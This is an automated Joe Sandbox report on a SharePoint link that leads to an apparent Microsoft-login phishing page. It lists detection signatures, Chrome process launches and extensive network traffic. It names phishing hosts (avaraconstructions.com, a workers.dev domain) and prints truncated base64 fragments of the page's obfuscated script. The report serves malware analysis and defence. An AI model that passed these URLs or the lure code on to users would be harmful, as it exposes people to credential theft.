Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT

Overview

General Information

Sample URL:https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT
Analysis ID:1590259

Detection

HTMLPhisher
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish54
HTML page contains hidden javascript code
HTML page contains obfuscated script src
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1936,i,17159132007562460234,12873969548115384310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.100.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    4.8.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      0.105.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        4.10.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: Yara matchFile source: 0.100.id.script.csv, type: HTML
          Source: Yara matchFile source: 4.8.pages.csv, type: HTML
          Source: Yara matchFile source: 0.105.id.script.csv, type: HTML
          Source: Yara matchFile source: 4.10.pages.csv, type: HTML
          Source: https://avaraconstructions.com/?1m2orf1ol=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9ZmUwYTUwNzktNGU3Ni1mNTkwLTYzZDEtMTU4MTk3MmRmZTkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyMzk0NTQ4ODk3MTYwOC4wZDk5OTRmNy03MjhhLTRkMTctYWRjNC0zMjYwYmI1MWNiZGMmc3RhdGU9RGN0QkVvQWdDRUJSck9rNEpDb0tIRWRsMnJicy1yRjRmX2NUQUp6aENJa2lJS09wMUdiY1dkV2tETktiM016NEVaU3FFOW1MNFBUTjJPcWd0WHJaeTNlSzk4cnZOX01QHTTP Parser: Base64 decoded: function c(){if(!document.querySelector(".b") || !document.querySelector(".g")){document.head.appendChild(Object.assign(document.createElement("div"),{classList:["b"]}));document.documentElement.style.filter="hue-rotate(4deg)";document.head.appendChild(Ob...
          Source: https://avaraconstructions.com/?1m2orf1ol=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
          Source: https://avaraconstructions.com/?1m2orf1ol=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
          Source: https://bc5d8028.26e125934b57cd512fa70e06.workers.dev/HTTP Parser: No favicon
          Source: https://bc5d8028.26e125934b57cd512fa70e06.workers.dev/HTTP Parser: No favicon
          Source: https://avaraconstructions.com/?1m2orf1ol=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9ZmUwYTUwNzktNGU3Ni1mNTkwLTYzZDEtMTU4MTk3MmRmZTkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyMzk0NTQ4ODk3MTYwOC4wZDk5OTRmNy03MjhhLTRkMTctYWRjNC0zMjYwYmI1MWNiZGMmc3RhdGU9RGN0QkVvQWdDRUJSck9rNEpDb0tIRWRsMnJicy1yRjRmX2NUQUp6aENJa2lJS09wMUdiY1dkV2tETktiM016NEVaU3FFOW1MNFBUTjJPcWd0WHJaeTNlSzk4cnZOX01QHTTP Parser: No favicon
          Source: https://avaraconstructions.com/?1m2orf1ol=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9ZmUwYTUwNzktNGU3Ni1mNTkwLTYzZDEtMTU4MTk3MmRmZTkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyMzk0NTQ4ODk3MTYwOC4wZDk5OTRmNy03MjhhLTRkMTctYWRjNC0zMjYwYmI1MWNiZGMmc3RhdGU9RGN0QkVvQWdDRUJSck9rNEpDb0tIRWRsMnJicy1yRjRmX2NUQUp6aENJa2lJS09wMUdiY1dkV2tETktiM016NEVaU3FFOW1MNFBUTjJPcWd0WHJaeTNlSzk4cnZOX01QHTTP Parser: No favicon
          Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49807 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49843 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:50019 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: global trafficDNS traffic detected: DNS query: timecusa-my.sharepoint.com
          Source: global trafficDNS traffic detected: DNS query: spo.nel.measure.office.net
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: r4.res.office365.com
          Source: global trafficDNS traffic detected: DNS query: config.fp.measure.office.com
          Source: global trafficDNS traffic detected: DNS query: 422718faef08a4348271976955cfa06a.fp.measure.office.com
          Source: global trafficDNS traffic detected: DNS query: bc5d8028.26e125934b57cd512fa70e06.workers.dev
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: tr-ooc-acdc.office.com
          Source: global trafficDNS traffic detected: DNS query: outlook.office365.com
          Source: global trafficDNS traffic detected: DNS query: upload.fp.measure.office.com
          Source: global trafficDNS traffic detected: DNS query: totaipower.ca
          Source: global trafficDNS traffic detected: DNS query: avaraconstructions.com
          Source: global trafficDNS traffic detected: DNS query: www.office.com
          Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
          Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
          Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
          Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
          Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49807 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49843 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:50019 version: TLS 1.2
          Source: classification engineClassification label: mal48.phis.win@21/126@78/413
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1936,i,17159132007562460234,12873969548115384310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcT"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1936,i,17159132007562460234,12873969548115384310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
